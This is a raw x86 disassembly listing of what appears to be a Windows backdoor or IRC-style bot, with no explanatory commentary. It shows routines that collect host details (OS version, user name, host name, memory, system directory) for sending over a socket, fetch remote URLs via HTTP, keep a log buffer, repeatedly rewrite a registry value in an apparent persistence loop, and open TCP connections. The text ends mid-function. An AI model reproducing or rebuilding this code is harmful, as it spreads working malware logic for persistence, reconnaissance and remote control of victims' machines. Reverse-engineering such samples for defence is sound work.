var_25A = byte ptr -25Ah
TimeStr = byte ptr -15Ch
DateStr = byte ptr -114h
VersionInformation= _OSVERSIONINFOA ptr -0CCh
var_38 = byte ptr -38h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
DirectoryName = byte ptr -18h
addr = byte ptr -0Ch
pcbBuffer = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
s = dword ptr 0Ch
push ebp
mov ebp, esp
sub esp, 968h
push ebx
push esi
lea eax, [ebp+VersionInformation]
push edi
push eax ; lpVersionInformation
mov [ebp+var_4], 440F9Ch
mov [ebp+VersionInformation.dwOSVersionInfoSize], 94h
call GetVersionExA ; GetVersionExA
xor ebx, ebx
cmp [ebp+VersionInformation.dwMajorVersion], 4
jnz short loc_40C445
cmp [ebp+VersionInformation.dwMinorVersion], ebx
jnz short loc_40C421
cmp [ebp+VersionInformation.dwPlatformId], 1
jnz short loc_40C40B
mov [ebp+var_4], 42FD90h
loc_40C40B: ; CODE XREF: sub_40C3BE+44�j
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz loc_40C4C0
mov [ebp+var_4], 42FD8Ch
jmp short loc_40C491
; ---------------------------------------------------------------------------
loc_40C421: ; CODE XREF: sub_40C3BE+3B�j
cmp [ebp+VersionInformation.dwMinorVersion], 0Ah
jnz short loc_40C433
mov [ebp+var_4], 42FD88h
jmp short loc_40C488
; ---------------------------------------------------------------------------
loc_40C433: ; CODE XREF: sub_40C3BE+6A�j
cmp [ebp+VersionInformation.dwMinorVersion], 5Ah
jnz short loc_40C481
mov [ebp+var_4], 42FD84h
jmp short loc_40C488
; ---------------------------------------------------------------------------
loc_40C445: ; CODE XREF: sub_40C3BE+33�j
cmp [ebp+VersionInformation.dwMajorVersion], 5
jnz short loc_40C481
cmp [ebp+VersionInformation.dwMinorVersion], ebx
jnz short loc_40C45F
mov [ebp+var_4], 42FD80h
jmp short loc_40C488
; ---------------------------------------------------------------------------
loc_40C45F: ; CODE XREF: sub_40C3BE+96�j
cmp [ebp+VersionInformation.dwMinorVersion], 1
jnz short loc_40C471
mov [ebp+var_4], 42FD7Ch
jmp short loc_40C488
; ---------------------------------------------------------------------------
loc_40C471: ; CODE XREF: sub_40C3BE+A8�j
cmp [ebp+VersionInformation.dwMinorVersion], 2
mov [ebp+var_4], 42FD74h
jz short loc_40C488
loc_40C481: ; CODE XREF: sub_40C3BE+7C�j
; sub_40C3BE+8E�j
mov [ebp+var_4], 42FD70h
loc_40C488: ; CODE XREF: sub_40C3BE+73�j
; sub_40C3BE+85�j ...
cmp [ebp+VersionInformation.dwPlatformId], 2
jnz short loc_40C4C0
loc_40C491: ; CODE XREF: sub_40C3BE+61�j
cmp [ebp+VersionInformation.szCSDVersion], bl
jz short loc_40C4C0
lea eax, [ebp+VersionInformation.szCSDVersion]
push eax
lea eax, [ebp+var_2E8]
push [ebp+var_4]
push 427450h
push eax
call sub_41795B
lea eax, [ebp+var_2E8]
add esp, 10h
mov [ebp+var_4], eax
loc_40C4C0: ; CODE XREF: sub_40C3BE+54�j
; sub_40C3BE+D1�j ...
mov ax, word ptr unk_42FD6C
push 3Fh
mov word ptr [ebp+Buffer], ax
pop ecx
xor eax, eax
lea edi, [ebp+var_25A]
rep stosd
stosw
mov eax, GetUserNameA
mov [ebp+pcbBuffer], 100h
cmp eax, ebx
jz short loc_40C4F9
lea ecx, [ebp+pcbBuffer]
push ecx ; pcbBuffer
lea ecx, [ebp+Buffer]
push ecx ; lpBuffer
call eax ; GetUserNameA
loc_40C4F9: ; CODE XREF: sub_40C3BE+12C�j
push [ebp+s] ; s
call sub_40B972
pop ecx
push eax ; cp
call inet_addr_0
mov dword ptr [ebp+addr], eax
push 2 ; type
lea eax, [ebp+addr]
push 4 ; len
push eax ; addr
call gethostbyaddr ; gethostbyaddr
cmp eax, ebx
jz short loc_40C522
push dword ptr [eax]
jmp short loc_40C527
; ---------------------------------------------------------------------------
loc_40C522: ; CODE XREF: sub_40C3BE+15E�j
push 42FD54h
loc_40C527: ; CODE XREF: sub_40C3BE+162�j
lea eax, [ebp+var_3E4]
push eax
call sub_41795B
pop ecx
lea eax, [ebp+var_4E8]
pop ecx
push 104h ; uSize
push eax ; lpBuffer
call GetSystemDirectoryA ; GetSystemDirectoryA
lea eax, [ebp+DateStr]
push 46h ; cchDate
push eax ; lpDateStr
push offset Format ; lpFormat
push ebx ; lpDate
mov esi, 409h
push ebx ; dwFlags
push esi ; Locale
call GetDateFormatA ; GetDateFormatA
lea eax, [ebp+TimeStr]
push 46h ; cchTime
push eax ; lpTimeStr
push offset unk_42AEDC ; lpFormat
push ebx ; lpTime
push ebx ; dwFlags
push esi ; Locale
call GetTimeFormatA ; GetTimeFormatA
push 20h
lea eax, [ebp+var_38]
push ebx
push eax
call sub_4179E0
add esp, 0Ch
lea eax, [ebp+var_38]
push eax ; lpBuffer
call GlobalMemoryStatus ; GlobalMemoryStatus
push ebx
push ebx
lea eax, [ebp+DirectoryName]
push ebx
push eax
lea eax, [ebp+var_4E8]
push eax
call sub_419B08
lea eax, [ebp+DirectoryName]
push eax ; lpDirectoryName
lea eax, [ebp+var_968]
push eax ; int
call sub_40DC92
push 60h
mov esi, eax
pop ecx
lea edi, [ebp+var_7E8]
rep movsd
push 60h
lea esi, [ebp+var_7E8]
pop ecx
lea edi, [ebp+var_668]
rep movsd
push ebx
call sub_40C21E
add esp, 20h
push eax
lea eax, [ebp+TimeStr]
push eax
lea eax, [ebp+DateStr]
push eax
lea eax, [ebp+Buffer]
push eax
push [ebp+s] ; s
call sub_40B972
pop ecx
push eax
lea eax, [ebp+var_3E4]
push eax
lea eax, [ebp+var_4E8]
push eax
lea eax, [ebp+var_5E8]
push [ebp+VersionInformation.dwBuildNumber]
push [ebp+VersionInformation.dwMinorVersion]
push [ebp+VersionInformation.dwMajorVersion]
push [ebp+var_4]
push eax
lea eax, [ebp+var_568]
push eax
mov eax, [ebp+var_2C]
shr eax, 0Ah
push ebx
push eax
call sub_40DB83
pop ecx
pop ecx
push eax
mov eax, [ebp+var_30]
shr eax, 0Ah
push ebx
push eax
call sub_40DB83
pop ecx
pop ecx
push eax
call sub_40C308
push edx
push eax
push 42FC70h
push 200h
push [ebp+arg_0]
call sub_417EDA
mov eax, [ebp+arg_0]
add esp, 50h
pop edi
pop esi
pop ebx
leave
retn
sub_40C3BE endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C672(int, int, SOCKET s)
sub_40C672 proc near ; CODE XREF: sub_40FCA3+462E�p
; sub_40FCA3+5B79�p
var_8C = byte ptr -8Ch
var_C = byte ptr -0Ch
var_8 = byte ptr -8
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
s = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 8Ch
push esi
mov esi, 80h
push esi
lea eax, [ebp+var_8C]
push 0
push eax
call sub_4179E0
add esp, 0Ch
cmp dword ptr byte_445EDC+2Ch, 0
jnz short loc_40C6E6
push 0
lea eax, [ebp+var_8C]
push esi
push eax
lea eax, [ebp+var_C]
push eax
call InternetGetConnectedStateEx ; InternetGetConnectedStateEx
test eax, eax
jnz short loc_40C6C7
lea eax, [ebp+var_8C]
push 42FDE4h
push eax
call sub_41795B
pop ecx
pop ecx
loc_40C6C7: ; CODE XREF: sub_40C672+40�j
test [ebp+var_C], 1
lea eax, [ebp+var_8]
jz short loc_40C6DF
push 42FDDCh
loc_40C6D5: ; CODE XREF: sub_40C672+72�j
push eax
call sub_41795B
pop ecx
pop ecx
jmp short loc_40C705
; ---------------------------------------------------------------------------
loc_40C6DF: ; CODE XREF: sub_40C672+5C�j
push 42FDD8h
jmp short loc_40C6D5
; ---------------------------------------------------------------------------
loc_40C6E6: ; CODE XREF: sub_40C672+28�j
mov esi, 42FDD4h
lea eax, [ebp+var_8]
push esi
push eax
call sub_41795B
lea eax, [ebp+var_8C]
push esi
push eax
call sub_41795B
add esp, 10h
loc_40C705: ; CODE XREF: sub_40C672+6B�j
push [ebp+arg_4]
push [ebp+s] ; s
call sub_40B972
pop ecx
push eax
lea eax, [ebp+var_8C]
push eax
lea eax, [ebp+var_8]
push eax
push 42FD94h
push 200h
push [ebp+arg_0]
call sub_417EDA
mov eax, [ebp+arg_0]
add esp, 1Ch
pop esi
leave
retn
sub_40C672 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40C738(LPCSTR lptstrFilename)
sub_40C738 proc near ; CODE XREF: sub_40F8D6+14B�p
puLen = dword ptr -0Ch
lpBuffer = dword ptr -8
dwHandle = dword ptr -4
lptstrFilename = dword ptr 8
push ebp
mov ebp, esp
sub esp, 0Ch
push esi
lea eax, [ebp+dwHandle]
push edi
push eax ; lpdwHandle
push [ebp+lptstrFilename] ; lptstrFilename
call GetFileVersionInfoSizeA
mov esi, eax
test esi, esi
jz loc_40C7DC
push esi
call sub_418175
mov edi, eax
pop ecx
test edi, edi
jz short loc_40C7DC
push edi ; lpData
push esi ; dwLen
push [ebp+dwHandle] ; dwHandle
push [ebp+lptstrFilename] ; lptstrFilename
call GetFileVersionInfoA
test eax, eax
jz short loc_40C7B6
lea eax, [ebp+puLen]
push eax ; puLen
lea eax, [ebp+lpBuffer]
push eax ; lplpBuffer
push offset SubBlock ; lpSubBlock
push edi ; pBlock
call VerQueryValueA
test eax, eax
jz short loc_40C7D5
mov eax, [ebp+lpBuffer]
cmp word ptr [eax+0Eh], 0A28h
jnz short loc_40C7D5
movzx eax, word ptr [eax+0Ch]
cmp eax, 884h
jz short loc_40C7D0
cmp eax, 9C9h
jz short loc_40C7CC
cmp eax, 0A7Dh
jz short loc_40C7C8
cmp eax, 0B4Ch
jz short loc_40C7C3
loc_40C7B6: ; CODE XREF: sub_40C738+3A�j
xor esi, esi
loc_40C7B8: ; CODE XREF: sub_40C738+8E�j
; sub_40C738+9B�j
push edi ; lpMem
call sub_418227
pop ecx
mov eax, esi
jmp short loc_40C7DE
; ---------------------------------------------------------------------------
loc_40C7C3: ; CODE XREF: sub_40C738+7C�j
push 2
loc_40C7C5: ; CODE XREF: sub_40C738+92�j
; sub_40C738+96�j
pop esi
jmp short loc_40C7B8
; ---------------------------------------------------------------------------
loc_40C7C8: ; CODE XREF: sub_40C738+75�j
push 4
jmp short loc_40C7C5
; ---------------------------------------------------------------------------
loc_40C7CC: ; CODE XREF: sub_40C738+6E�j
push 3
jmp short loc_40C7C5
; ---------------------------------------------------------------------------
loc_40C7D0: ; CODE XREF: sub_40C738+67�j
xor esi, esi
inc esi
jmp short loc_40C7B8
; ---------------------------------------------------------------------------
loc_40C7D5: ; CODE XREF: sub_40C738+51�j
; sub_40C738+5C�j
push edi ; lpMem
call sub_418227
pop ecx
loc_40C7DC: ; CODE XREF: sub_40C738+18�j
; sub_40C738+29�j
xor eax, eax
loc_40C7DE: ; CODE XREF: sub_40C738+89�j
pop edi
pop esi
leave
retn
sub_40C738 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40C7E2(LPVOID)
sub_40C7E2 proc near ; DATA XREF: sub_40FCA3+4C2D�o
var_65C = byte ptr -65Ch
var_55C = dword ptr -55Ch
s = dword ptr -35Ch
var_358 = byte ptr -358h
var_2D8 = byte ptr -2D8h
var_258 = dword ptr -258h
var_1D8 = dword ptr -1D8h
var_1D4 = dword ptr -1D4h
var_1D0 = dword ptr -1D0h
var_1C8 = byte ptr -1C8h
var_148 = byte ptr -148h
var_C8 = byte ptr -0C8h
var_48 = dword ptr -48h
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = word ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 65Ch
mov eax, [ebp+arg_0]
push ebx
push esi
push edi
push 65h
mov esi, eax
pop ecx
lea edi, [ebp+s]
rep movsd
xor esi, esi
mov edi, 80h
inc esi
xor ebx, ebx
mov [eax+190h], esi
push edi
lea eax, [ebp+var_148]
push ebx
push eax
mov [ebp+var_C], ebx
mov [ebp+var_4], ebx
mov [ebp+var_8], 42FF18h
call sub_4179E0
push edi
lea eax, [ebp+var_1C8]
push ebx
push eax
call sub_4179E0
push edi
lea eax, [ebp+var_C8]
push ebx
push eax
call sub_4179E0
push 100h
lea eax, [ebp+var_65C]
push ebx
push eax
call sub_4179E0
push 3Ch
lea eax, [ebp+var_48]
pop edi
push edi
push ebx
push eax
call sub_4179E0
add esp, 3Ch
lea eax, [ebp+var_48]
mov [ebp+var_48], edi
mov [ebp+var_34], esi
push eax
lea eax, [ebp+var_358]
push ebx
push eax
mov [ebp+var_28], esi
mov [ebp+var_20], esi
mov [ebp+var_18], esi
call sub_4180D0
pop ecx
push eax
lea eax, [ebp+var_358]
push eax
call InternetCrackUrlA ; InternetCrackUrlA
test eax, eax
jz loc_40C982
cmp [ebp+var_34], ebx
jbe short loc_40C8B9
push [ebp+var_34]
lea eax, [ebp+var_148]
push [ebp+var_38]
push eax
call sub_419300
add esp, 0Ch
loc_40C8B9: ; CODE XREF: sub_40C7E2+C0�j
cmp [ebp+var_28], ebx
movzx esi, [ebp+var_30]
jbe short loc_40C8D7
push [ebp+var_28]
lea eax, [ebp+var_1C8]
push [ebp+var_2C]
push eax
call sub_419300
add esp, 0Ch
loc_40C8D7: ; CODE XREF: sub_40C7E2+DE�j
cmp [ebp+var_20], ebx
jbe short loc_40C8F1
push [ebp+var_20]
lea eax, [ebp+var_C8]
push [ebp+var_24]
push eax
call sub_419300
add esp, 0Ch
loc_40C8F1: ; CODE XREF: sub_40C7E2+F8�j
cmp [ebp+var_18], ebx
jbe short loc_40C90B
push [ebp+var_18]
lea eax, [ebp+var_65C]
push [ebp+var_1C]
push eax
call sub_419300
add esp, 0Ch
loc_40C90B: ; CODE XREF: sub_40C7E2+112�j
push ebx
push ebx
lea eax, [ebp+var_C8]
push 3
push eax
lea eax, [ebp+var_1C8]
push eax
lea eax, [ebp+var_148]
push esi
push eax
push dword ptr byte_445DD4
call InternetConnectA ; InternetConnectA
mov esi, eax
cmp esi, ebx
jz short loc_40C998
push ebx
lea eax, [ebp+var_8]
push 200h
push eax
lea eax, [ebp+var_2D8]
push eax
lea eax, [ebp+var_65C]
push ebx
push eax
push ebx
push esi
call HttpOpenRequestA ; HttpOpenRequestA
cmp eax, ebx
mov [ebp+var_4], eax
jz short loc_40C99F
push ebx
push ebx
push ebx
push ebx
push eax
call HttpSendRequestA ; HttpSendRequestA
test eax, eax
lea eax, [ebp+var_55C]
jz short loc_40C97B
push 42FEECh
jmp short loc_40C9AA
; ---------------------------------------------------------------------------
loc_40C97B: ; CODE XREF: sub_40C7E2+190�j
push 42FEA0h
jmp short loc_40C9AA
; ---------------------------------------------------------------------------
loc_40C982: ; CODE XREF: sub_40C7E2+B7�j
lea eax, [ebp+var_55C]
push 42FE74h
push eax
call sub_41795B
mov esi, [ebp+var_C]
jmp short loc_40C9B0
; ---------------------------------------------------------------------------
loc_40C998: ; CODE XREF: sub_40C7E2+153�j
push 42FE38h
jmp short loc_40C9A4
; ---------------------------------------------------------------------------
loc_40C99F: ; CODE XREF: sub_40C7E2+17B�j
push 42FDF8h
loc_40C9A4: ; CODE XREF: sub_40C7E2+1BB�j
lea eax, [ebp+var_55C]
loc_40C9AA: ; CODE XREF: sub_40C7E2+197�j
; sub_40C7E2+19E�j
push eax
call sub_41795B
loc_40C9B0: ; CODE XREF: sub_40C7E2+1B4�j
cmp [ebp+var_1D4], ebx
pop ecx
pop ecx
jnz short loc_40C9DD
push ebx ; int
lea eax, [ebp+var_55C]
push [ebp+var_1D0] ; int
push eax ; int
lea eax, [ebp+var_258]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40C9DD: ; CODE XREF: sub_40C7E2+1D6�j
lea eax, [ebp+var_55C]
push eax
call sub_40CB08
pop ecx
push esi
call InternetCloseHandle ; InternetCloseHandle
push [ebp+var_4]
call InternetCloseHandle ; InternetCloseHandle
push [ebp+var_1D8]
call sub_417735
pop ecx
push ebx ; dwExitCode
call ExitThread ; ExitThread
sub_40C7E2 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
pop ebx
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CA10 proc near ; CODE XREF: sub_40FCA3+4567�p
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
and [ebp+var_4], 0
push esi
push edi
mov esi, 44AAE8h
mov edi, 0B8h
loc_40CA24: ; CODE XREF: sub_40CA10+33�j
cmp byte ptr [esi], 0
jz short loc_40CA47
push [ebp+arg_0]
push esi
call sub_417D80
pop ecx
test eax, eax
pop ecx
jz short loc_40CA47
inc [ebp+var_4]
add esi, edi
cmp esi, 44B668h
jl short loc_40CA24
jmp short loc_40CA89
; ---------------------------------------------------------------------------
loc_40CA47: ; CODE XREF: sub_40CA10+17�j
; sub_40CA10+26�j
mov esi, [ebp+var_4]
push ebx
imul esi, 0B8h
push edi
push 0
lea ebx, [esi+44AAE8h]
push ebx
call sub_4179E0
push 17h
push [ebp+arg_0]
push ebx
call sub_419300
push 9Fh
lea eax, [esi+44AB00h]
push [ebp+arg_4]
push eax
call sub_419300
add esp, 24h
inc dword ptr unk_4333B8
pop ebx
loc_40CA89: ; CODE XREF: sub_40CA10+35�j
mov eax, [ebp+var_4]
pop edi
pop esi
leave
retn
sub_40CA10 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40CA90(SOCKET s, int, int)
sub_40CA90 proc near ; CODE XREF: sub_40FCA3+5CB0�p
var_200 = dword ptr -200h
s = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 200h
push esi
push edi
push 0 ; int
push [ebp+arg_8] ; int
push 42FF28h ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
xor edi, edi
mov esi, 44AAE8h
loc_40CABA: ; CODE XREF: sub_40CA90+72�j
cmp byte ptr [esi], 0
jz short loc_40CAF5
lea eax, [esi+18h]
push eax
push esi
push edi
push 42FF1Ch
lea eax, [ebp+var_200]
push 200h
push eax
call sub_417EDA
push 1 ; int
lea eax, [ebp+var_200]
push [ebp+arg_8] ; int
push eax ; int
push [ebp+arg_4] ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 2Ch
loc_40CAF5: ; CODE XREF: sub_40CA90+2D�j
add esi, 0B8h
inc edi
cmp esi, 44B668h
jl short loc_40CABA
pop edi
pop esi
leave
retn
sub_40CA90 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB08 proc near ; CODE XREF: sub_401000+97�p
; sub_4010B2+32C�p ...
SystemTime = _SYSTEMTIME ptr -10h
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 10h
push ebx
push esi
lea eax, [ebp+SystemTime]
push edi
push eax ; lpSystemTime
call GetLocalTime ; GetLocalTime
mov ebx, 44A1E0h
mov edi, 80h
mov esi, 4461E0h
loc_40CB2A: ; CODE XREF: sub_40CB08+3D�j
cmp byte ptr [ebx], 0
jz short loc_40CB41
push 7Fh
lea eax, [ebx+80h]
push ebx
push eax
call sub_419300
add esp, 0Ch
loc_40CB41: ; CODE XREF: sub_40CB08+25�j
sub ebx, edi
cmp ebx, esi
jge short loc_40CB2A
movzx eax, [ebp+SystemTime.wSecond]
push [ebp+arg_0]
push eax
movzx eax, [ebp+SystemTime.wMinute]
push eax
movzx eax, [ebp+SystemTime.wHour]
push eax
movzx eax, [ebp+SystemTime.wYear]
push eax
movzx eax, [ebp+SystemTime.wDay]
push eax
movzx eax, [ebp+SystemTime.wMonth]
push eax
push 42FF38h
push edi
push esi
call sub_417EDA
add esp, 28h
pop edi
pop esi
pop ebx
leave
retn
sub_40CB08 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_40CB7C proc near ; CODE XREF: sub_40852E+150�p
; sub_4086BE+15C�p ...
var_80 = byte ptr -80h
arg_0 = dword ptr 8
arg_4 = byte ptr 0Ch
push ebp
mov ebp, esp
sub esp, 80h
lea eax, [ebp+arg_4]
push eax
lea eax, [ebp+var_80]
push [ebp+arg_0]
push 80h
push eax
call sub_419C4F
lea eax, [ebp+var_80]
push eax
call sub_40CB08
add esp, 14h
leave
retn
sub_40CB7C endp
; =============== S U B R O U T I N E =======================================
; int __cdecl sub_40CBA8(SOCKET s, int, int, int)
sub_40CBA8 proc near ; CODE XREF: sub_40FCA3+5BAD�p
s = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
arg_C = dword ptr 10h
mov eax, 4461E0h
xor ecx, ecx
loc_40CBAF: ; CODE XREF: sub_40CBA8+13�j
mov [eax], cl
add eax, 80h
cmp eax, 44A1E0h
jl short loc_40CBAF
cmp [esp+arg_C], ecx
push esi
mov esi, 42FF5Ch
jnz short loc_40CBDF
push ecx ; int
push [esp+8+arg_8] ; int
push esi ; int
push [esp+10h+arg_4] ; int
push [esp+14h+s] ; s
call sub_40E1D6
add esp, 14h
loc_40CBDF: ; CODE XREF: sub_40CBA8+1F�j
push esi
call sub_40CB08
pop ecx
pop esi
retn
sub_40CBA8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn bp-based frame
; DWORD __stdcall sub_40CBE8(LPVOID)
sub_40CBE8 proc near ; DATA XREF: sub_40FCA3+5C5D�o
var_31C = dword ptr -31Ch
s = dword ptr -11Ch
var_118 = dword ptr -118h
var_98 = byte ptr -98h
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
push ebp
mov ebp, esp
sub esp, 31Ch
mov eax, [ebp+arg_0]
push esi
push edi
push 45h
pop ecx
mov esi, eax
lea edi, [ebp+s]
xor edx, edx
rep movsd
xor edi, edi
mov [ebp+var_8], 80h
inc edi
cmp [ebp+var_10], edx
mov [ebp+var_4], edx
mov [eax+110h], edi
jnz short loc_40CC3B
push edx ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push 42FFB0h ; int
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40CC3B: ; CODE XREF: sub_40CBE8+33�j
cmp [ebp+var_98], 0
jz short loc_40CC5B
lea eax, [ebp+var_98]
push eax
call sub_417ECF
test eax, eax
pop ecx
mov [ebp+var_4], eax
jz short loc_40CC5B
mov [ebp+var_8], eax
loc_40CC5B: ; CODE XREF: sub_40CBE8+5A�j
; sub_40CBE8+6E�j
and [ebp+arg_0], 0
mov esi, 4461E0h
loc_40CC64: ; CODE XREF: sub_40CBE8+D4�j
mov eax, [ebp+arg_0]
cmp eax, [ebp+var_8]
jge short loc_40CCBE
cmp byte ptr [esi], 0
jz short loc_40CCAD
cmp [ebp+var_98], 0
jz short loc_40CC93
cmp [ebp+var_4], 0
jnz short loc_40CC93
lea eax, [ebp+var_98]
push eax
push esi
call sub_40B2B3
pop ecx
test eax, eax
pop ecx
jz short loc_40CCAD
loc_40CC93: ; CODE XREF: sub_40CBE8+90�j
; sub_40CBE8+96�j
push edi ; int
lea eax, [ebp+var_118]
push [ebp+var_14] ; int
push esi ; int
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40CCAD: ; CODE XREF: sub_40CBE8+87�j
; sub_40CBE8+A9�j
inc [ebp+arg_0]
add esi, 80h
cmp esi, 44A1E0h
jl short loc_40CC64
loc_40CCBE: ; CODE XREF: sub_40CBE8+82�j
lea eax, [ebp+var_31C]
push 42FF84h
push eax
call sub_41795B
xor esi, esi
pop ecx
cmp [ebp+var_10], esi
pop ecx
jnz short loc_40CCF8
push esi ; int
lea eax, [ebp+var_31C]
push [ebp+var_14] ; int
push eax ; int
lea eax, [ebp+var_118]
push eax ; int
push [ebp+s] ; s
call sub_40E1D6
add esp, 14h
loc_40CCF8: ; CODE XREF: sub_40CBE8+EE�j
lea eax, [ebp+var_31C]
push eax
call sub_40CB08
push [ebp+var_18]
call sub_417735
pop ecx
pop ecx
push esi ; dwExitCode
call ExitThread ; ExitThread
sub_40CBE8 endp
; ---------------------------------------------------------------------------
pop edi
pop esi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40CD17(BYTE *lpData)
sub_40CD17 proc near ; CODE XREF: sub_40B584+1E�p
; sub_40CD88+4�p ...
hKey = dword ptr -4
lpData = dword ptr 8
push ebp
mov ebp, esp
push ecx
push ebx
push esi
push edi
xor edi, edi
xor esi, esi
mov ebx, offset ValueName
loc_40CD27: ; CODE XREF: sub_40CD17+6A�j
lea eax, [ebp+hKey]
push edi ; lpdwDisposition
push eax ; phkResult
push edi ; lpSecurityAttributes
push 0F003Fh ; samDesired
push edi ; dwOptions
push edi ; lpClass
push edi ; Reserved
push dword ptr [esi+42FFD8h] ; lpSubKey
push dword ptr [esi+42FFD4h] ; hKey
call RegCreateKeyExA ; RegCreateKeyExA
cmp [ebp+lpData], edi
jz short loc_40CD68
push [ebp+lpData]
call sub_4180D0
pop ecx
push eax ; cbData
push [ebp+lpData] ; lpData
push 1 ; dwType
push edi ; Reserved
push ebx ; lpValueName
push [ebp+hKey] ; hKey
call RegSetValueExA ; RegSetValueExA
jmp short loc_40CD72
; ---------------------------------------------------------------------------
loc_40CD68: ; CODE XREF: sub_40CD17+33�j
push ebx ; lpValueName
push [ebp+hKey] ; hKey
call RegDeleteValueA ; RegDeleteValueA
loc_40CD72: ; CODE XREF: sub_40CD17+4F�j
push [ebp+hKey] ; hKey
call RegCloseKey ; RegCloseKey
add esi, 8
cmp esi, 18h
jb short loc_40CD27
pop edi
pop esi
pop ebx
leave
retn
sub_40CD17 endp
; =============== S U B R O U T I N E =======================================
; Attributes: noreturn
; DWORD __stdcall sub_40CD88(LPVOID)
sub_40CD88 proc near ; CODE XREF: sub_40CD88+16�j
; DATA XREF: sub_40F1EA+54A�o
lpData = dword ptr 4
push [esp+lpData] ; lpData
call sub_40CD17
pop ecx
push dwMilliseconds ; dwMilliseconds
call Sleep ; Sleep
jmp short sub_40CD88
sub_40CD88 endp
; =============== S U B R O U T I N E =======================================
sub_40CDA0 proc near ; CODE XREF: sub_40CDD9+54�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov edx, [esp+arg_0]
push esi
push edi
mov edi, [esp+8+arg_4]
or esi, 0FFFFFFFFh
test edi, edi
jz short loc_40CDD2
mov ecx, 0FFh
push ebx
loc_40CDB7: ; CODE XREF: sub_40CDA0+2F�j
mov al, [edx]
mov ebx, esi
and eax, ecx
and ebx, ecx
xor eax, ebx
shr esi, 8
mov eax, dword ptr unk_424288[eax*4]
xor esi, eax
inc edx
dec edi
jnz short loc_40CDB7
pop ebx
loc_40CDD2: ; CODE XREF: sub_40CDA0+F�j
mov eax, esi
pop edi
not eax
pop esi
retn
sub_40CDA0 endp
; =============== S U B R O U T I N E =======================================
sub_40CDD9 proc near ; CODE XREF: sub_40D66D+23F�p
var_10 = dword ptr -10h
arg_0 = dword ptr 4
push ebx
push esi
xor ebx, ebx
push edi
push ebx
call sub_418175
mov [esp+10h+var_10], 42ACB0h
push [esp+10h+arg_0]
mov esi, eax
call sub_41924D
mov edi, eax
pop ecx
test edi, edi
pop ecx
jnz short loc_40CE24
loc_40CDFE: ; CODE XREF: sub_40CDD9+37�j
xor eax, eax
jmp short loc_40CE45
; ---------------------------------------------------------------------------
loc_40CE02: ; CODE XREF: sub_40CDD9+4F�j
inc ebx
push ebx ; dwBytes
push esi ; lpMem
call sub_419C9F
mov esi, eax
pop ecx
test esi, esi
pop ecx
jz short loc_40CDFE
push edi
push 1
lea eax, [esi+ebx-1]
push 1
push eax
call sub_418F61
add esp, 10h
loc_40CE24: ; CODE XREF: sub_40CDD9+23�j
test byte ptr [edi+0Ch], 10h
jz short loc_40CE02
dec ebx
push ebx
push esi
call sub_40CDA0
push esi ; lpMem
mov ebx, eax
call sub_418227
push edi
call sub_418F0B
add esp, 10h
mov eax, ebx
loc_40CE45: ; CODE XREF: sub_40CDD9+27�j
pop edi
pop esi
pop ebx
retn
sub_40CDD9 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_40CE49(char *name, u_short hostshort)
sub_40CE49 proc near ; CODE XREF: sub_40CECF+33�p
; sub_40D432+BC�p
var_10 = word ptr -10h
var_E = word ptr -0Eh
var_C = dword ptr -0Ch
name = dword ptr 8
hostshort = word ptr 0Ch
push ebp
mov ebp, esp
sub esp, 10h
push esi
push edi
push 0 ; protocol
push 1 ; type
push 2 ; af
call socket_0
mov edi, eax
or esi, 0FFFFFFFFh
cmp edi, esi
jz short loc_40CEC5
push 10h
lea eax, [ebp+var_10]
push 0
push eax
call sub_4179E0
add esp, 0Ch
mov [ebp+var_10], 2
push dword ptr [ebp+hostshort] ; hostshort
call htons_2
push [ebp+name] ; cp
mov [ebp+var_E], ax
call inet_addr_0
cmp eax, esi
jnz short loc_40CEAA
push [ebp+name] ; name
call gethostbyname ; gethostbyname
test eax, eax
jz short loc_40CEC5
mov eax, [eax+0Ch]
mov eax, [eax]
mov eax, [eax]
loc_40CEAA: ; CODE XREF: sub_40CE49+4B�j
mov [ebp+var_C], eax
lea eax, [ebp+var_10]
push 10h ; namelen
push eax ; name
push edi ; s
call connect_0
cmp eax, esi
jnz short loc_40CEC9
push edi ; s
call closesocket_0
